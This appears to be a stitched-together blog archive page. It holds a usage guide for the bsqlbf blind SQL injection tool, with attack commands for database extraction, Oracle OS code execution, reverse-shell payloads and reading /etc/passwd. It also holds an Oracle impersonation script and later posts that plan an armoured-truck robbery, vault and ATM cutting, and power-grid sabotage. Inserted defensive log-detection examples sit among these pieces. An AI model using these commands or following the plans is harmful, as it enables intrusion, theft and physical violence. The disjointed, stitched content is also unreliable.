Wednesday, October 11, 2017

Automated Blind SQL Injection Attacking Tools: bsqlbf Brute Forcer

There are plenty of automated Blind SQL Injection tools available. Here I am introducing one of them, named bsqlbf (expanded as Blind SQL Injection Brute Forcer).
This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter, and it works for both integer-based and string-based injections.
Supported Database:
  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle
The tool supports 8 attack modes (-type switch):
Type 0: Blind SQL Injection based on true and false conditions returned by the back-end server
Type 1: Blind SQL Injection based on true and error (e.g. syntax error) conditions returned by the back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: O.S. code execution (ORACLE dbms_export_extension exploit)
Type 5: reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: O.S. code execution, DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: O.S. code execution, SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA privileges required
-cmd=revshell: Type 7 supports meterpreter payload execution; run generator.exe first
Type 8: O.S. code execution, DBMS_JAVA_TEST.FUNCALL, with JAVA IO permissions
-cmd=revshell: Type 8 supports meterpreter payload execution; run generator.exe first
For Type 4 (O.S. code execution) the following methods are supported:
-stype: how you want to execute the command:
SType 0 (default) is based on java; will NOT work against XE.
SType 1 is against Oracle 9 with plsql_native_make_utility.
SType 2 is against Oracle 10 with dbms_scheduler.
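Added example (not part of the original post and not bsqlbf code): from the defender's side, the Type 0/Type 1 brute forcing described above leaves a recognisable trace in web server access logs, namely a burst of requests from one client on one parameter that differ only by an injected boolean condition or an ascii/substring comparison, answered with two distinct response sizes (the true/false oracle the tool needs). The log lines below are constructed for illustration; the path, parameter name and sizes are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Common Log Format); not real traffic.
# Client 10.0.0.5 behaves like a boolean-based blind SQLi brute forcer on ?foo=.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Oct/2017:10:01:01 +0000] "GET /script.php?foo=1000 HTTP/1.1" 200 512
10.0.0.5 - - [11/Oct/2017:10:01:02 +0000] "GET /script.php?foo=1000%20and%201=1 HTTP/1.1" 200 512
10.0.0.5 - - [11/Oct/2017:10:01:03 +0000] "GET /script.php?foo=1000%20and%201=2 HTTP/1.1" 200 87
10.0.0.5 - - [11/Oct/2017:10:01:04 +0000] "GET /script.php?foo=1000%20and%20ascii(substring(version(),1,1))%3E64 HTTP/1.1" 200 512
10.0.0.5 - - [11/Oct/2017:10:01:05 +0000] "GET /script.php?foo=1000%20and%20ascii(substring(version(),1,1))%3E96 HTTP/1.1" 200 87
192.0.2.9 - - [11/Oct/2017:10:02:00 +0000] "GET /script.php?foo=7 HTTP/1.1" 200 498
192.0.2.9 - - [11/Oct/2017:10:02:10 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Signatures of the probes the tool's modes rely on: boolean tautology/contradiction
# (Type 0/1), ORDER BY / GROUP BY column probing (Type 2), per-character extraction.
BLIND_SIGS = [
    re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    re.compile(r"\b(order|group)\s+by\s+\d+", re.I),
    re.compile(r"\b(ascii|substr(ing)?|mid)\s*\(", re.I),
]

def parse_line(line):
    """Return (client, path, decoded query params, response size) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status, size = m.groups()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}  # parse_qs URL-decodes
    return ip, parts.path, params, size

def analyze(log_text, min_probes=2):
    """Group signature hits per (client, path, parameter); report groups with at least
    min_probes hits. 'oracle' is True when responses come in more than one size, i.e.
    the application leaks the true/false distinction a brute forcer needs."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, params, size = rec
        for name, value in params.items():
            if any(sig.search(value) for sig in BLIND_SIGS):
                groups[(ip, path, name)].append(size)
    return [{"client": ip, "path": path, "param": name, "probes": len(sizes),
             "oracle": len(set(sizes)) > 1}
            for (ip, path, name), sizes in groups.items() if len(sizes) >= min_probes]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The size-based oracle check is what distinguishes a working injection point from noisy scanning: if every probe returns the same page, the parameter is probably not exploitable this way, which is also why the tool's -match option matters.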


CODE FOR SQL INJECTION WITH WHITEHAT DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC


Blind Sql Injection Brute Forcer version 2
This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl

// Blind SQL injection brute forcer \\
//originally written by...aramosf@514.es  \\
// mofified by sid-at-notsosecure.com \\
// http://www.notsosecure.com \\
---------------------usage:-------------------------------------------
Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options)
String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options)
------------------------------------options:--------------------------
-sql:          valid SQL syntax to get; version(), database(),
(select  table_name from inforamtion_schema.tables limit 1 offset 0)
-get:          If MySQL user is root, supply word readable file name
-blind:        parameter to inject sql. Default is last value of url
-match:        *RECOMMENDED* string to match in valid query, Default is auto
-start:        if you know the beginning of the string, use it.
-length:       maximum length of value. Default is 32.
-time:         timer options:
0:      dont wait. Default option.
1:      wait 15 seconds
2:      wait 5 minutes

-type:         Type of injection:
0:      Type 0 (default) is blind injection based on True and False responses
1:      Type 1 is blind injection based on True and Error responses
2:      Type 2 is injection in order by and group by
3:      Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
4:      Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)
5:      Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)

-file: File to read (default C:\boot.ini)

-stype:        How you want to execute command:
0:      SType 0 (default) is based on java..will NOT work against XE
1:      SType 1 is against oracle 9 with plsql_native_make_utility
2:      SType 2 is against oracle 10 with dbms_scheduler
-database:     Backend database:
0:      MS-SQL (Default)
1:      MYSQL
2:      POSTGRES
3:      ORACLE
-rtime:        wait random seconds, for example: "10-20".
-method:       http method to use; get or post. Default is GET.
-cmd:          command to execute(type 4 only). Default is "ping 127.0.0.1."
-uagent:       http UserAgent header to use. Default is bsqlbf 2.3
-ruagent:      file with random http UserAgent header to use.
-cookie:       http cookie header to use
-rproxy:       use random http proxy from file list.
-proxy:        use proxy http. Syntax -proxy=http://proxy:port/
-proxy_user:   proxy http user
-proxy_pass:   proxy http password

---------------------------- examples:-------------------------------
bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1

bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

Ok, boolean tribe..the hoores feel very much protected still by Oracle. So, let me be a bitch and not an intellectual! Let me dig this 1st aspect: "the actual username can be spoofed by use of BECOME USER. This leads to the fact that some spoofing can be done before the session". I want to transfer data from the piece of shit, not exactly on a MIM's. So I do get in, as BECOME USER? Let me start being a bitch! over with brains olympic games NSA!

How to become another User in SQLPlus

See this link for a much better way to achieve this in current releases, using proxy users...
A DBA frequently needs to become another user to test something or verify a problem. Short of having to gain access to that user's password, we are asked "can I su to that account", sort of like root does on unix.
This is an 'su.sql' script I use:

-- any SQL error (no access to sys.dba_users, unknown user) aborts the SQL*Plus session
whenever sqlerror exit
-- capture the PASSWORD column of the next query into the substitution variable &pw
column password new_value pw
declare
    l_passwd varchar2(45);
begin
    -- raises NO_DATA_FOUND (and therefore exits) when the user does not exist
    select password into l_passwd
      from sys.dba_users
     where username = upper('&1');
end;
/

-- this query's PASSWORD value is what fills &pw via COLUMN ... NEW_VALUE above
select password
  from sys.dba_users
 where username = upper( '&1' )
/

-- set a known temporary password, connect as the target user, then put the
-- original hash back; 'Hello' vs 'hello' only works while passwords are
-- case-insensitive (the pre-11g behaviour)
alter user &1 identified by Hello;
connect &1/hello
alter user &1 identified by values '&pw';
show user
whenever sqlerror continue

It starts by testing your access to the sys.dba_users table -- if that fails -- it exits SQLPlus. If zero rows are returned -- it exits SQLPlus.

It then selects the 'password' from the dba_users table and stuffs it into a macro variable "&pw".
We alter the user you want to become to have a known password (if that fails, we exit).
We 'fix' their password back after logging in as them....
Note, you need to have access to dba_users and the alter user privilege.
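Added example (not from the original post or from asktom): the su.sql sequence above is also a pattern a database defender can look for in the Oracle audit trail, since a legitimate password reset is rarely followed within minutes by a logon as that account and an "identified by values" restore of the old hash. The records below are constructed and their field names (modelled loosely on DBA_AUDIT_TRAIL's OS_USERNAME, USERNAME, ACTION_NAME, SQL_TEXT) are an assumption to map onto your own audit source.

```python
import re
from datetime import datetime, timedelta

# Constructed audit records; the field names are an assumption, map your own
# audit source (DBA_AUDIT_TRAIL, unified audit, syslog) onto them.
AUDIT = [
    {"ts": "2017-10-11 09:00:01", "os_user": "dba1", "db_user": "SYSTEM",
     "action": "ALTER USER", "sql": "alter user SCOTT identified by Hello"},
    {"ts": "2017-10-11 09:00:02", "os_user": "dba1", "db_user": "SCOTT",
     "action": "LOGON", "sql": ""},
    {"ts": "2017-10-11 09:00:03", "os_user": "dba1", "db_user": "SCOTT",
     "action": "ALTER USER", "sql": "alter user SCOTT identified by values 'DEADBEEF00000000'"},
    # a routine reset: no logon as the account, no hash restore -> not flagged
    {"ts": "2017-10-11 10:30:00", "os_user": "dba1", "db_user": "SYSTEM",
     "action": "ALTER USER", "sql": "alter user HR identified by Welcome1"},
]

SET_PLAIN = re.compile(r"alter\s+user\s+(\w+)\s+identified\s+by\s+(?!values\b)\S+", re.I)
SET_HASH = re.compile(r"alter\s+user\s+(\w+)\s+identified\s+by\s+values\b", re.I)
FMT = "%Y-%m-%d %H:%M:%S"

def find_su_sequences(records, window_seconds=600):
    """Flag each plaintext password set that is followed, within the window, by a
    LOGON as the same account and an IDENTIFIED BY VALUES restore of its hash."""
    window = timedelta(seconds=window_seconds)
    recs = sorted(records, key=lambda r: r["ts"])
    findings = []
    for i, rec in enumerate(recs):
        m = SET_PLAIN.match(rec["sql"]) if rec["action"] == "ALTER USER" else None
        if m is None:
            continue
        target = m.group(1).upper()
        t0 = datetime.strptime(rec["ts"], FMT)
        saw_logon = saw_restore = False
        for later in recs[i + 1:]:
            if datetime.strptime(later["ts"], FMT) - t0 > window:
                break
            if later["action"] == "LOGON" and later["db_user"].upper() == target:
                saw_logon = True
            r = SET_HASH.match(later["sql"])
            if r is not None and r.group(1).upper() == target:
                saw_restore = True
        if saw_logon and saw_restore:
            findings.append({"target": target, "set_by": rec["db_user"],
                             "os_user": rec["os_user"], "at": rec["ts"]})
    return findings

if __name__ == "__main__":
    for f in find_su_sequences(AUDIT):
        print("possible su.sql-style impersonation:", f)
```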


https://asktom.oracle.com/Misc/su.html

Nickelback - Get 'Em Up

what about the drones gang? let's make a palestinian move...the tunnel. tunnel for car exist and train dispersion


Elsa David so...get ready for the maps, their schedule, their path...and do it

Good morning crew! welcome back to war! So, we're talking about a big convoy of at least 15 "géninhos" heavly armed. 2 cars, 4 agents, 1 jipe, 3 agents, the truck, 4 agents, one car ,2 agents! So, best path is near Parque das Nações, and our best shot, is a sonic attack, to neutralize their movements.

Tuesday, October 10, 2017

remember I bought that 1300'C Metal Melting Butane Jet Torch ?...like i said to you, you need 2500.º C to cut trought 15 cm of steel doors, but 1300.º cutcommon vaults or ATM's

I HAVE A PLAN...ARE U IN?





I just got my amulet, my dark wolf and the boar teeth...wolves are the most surviving animals there are...they lose here, for an incredible disadvantage on water...and another night of hunger...after running on the most difficult environment of all...like myself...eventually I'll get my meal.

Ok, everybody...the best plan until now, is have vault truck stopped on the endpoint receptor, and use a ton lifter hydraulic and then an also hydraulic spreader opening steel doors, forced entry

HYDRAULIC TON LIFTER 


  

                                           The Broco® CF-3 (Crow's Foot) Hydraulic Spreader assists in opening all types inward and outward opening doors and is ideal for distorting/destroying security gates and window bars.  Machined from hardened billet steel, the CF-3 has unbelievable strength and maximum reliability making it tougher than forged alternatives. The unique 90 degree hose swivel enables it to be easily utilized in all positions.


https://www.broco-rankin.com/tactical/forced-entry/cf-3-/

Hello worldwide!!! welcome back to war! Guys were saying to me (and I already saw it) banking vault trucks usualy have tubular locks (as ATM's) like this...( the Medeco Tx is not really used...but we'll go there)

Energy Blackouts total electric outage graphite carbon balls trow 2 ground impact

  https://www.alibaba.com/product-detail/Graphite-Carbon-Ball-C80-Instead-of_1601156433008.html?spm=a2700.galleryofferlist.normal_offer.d_ti...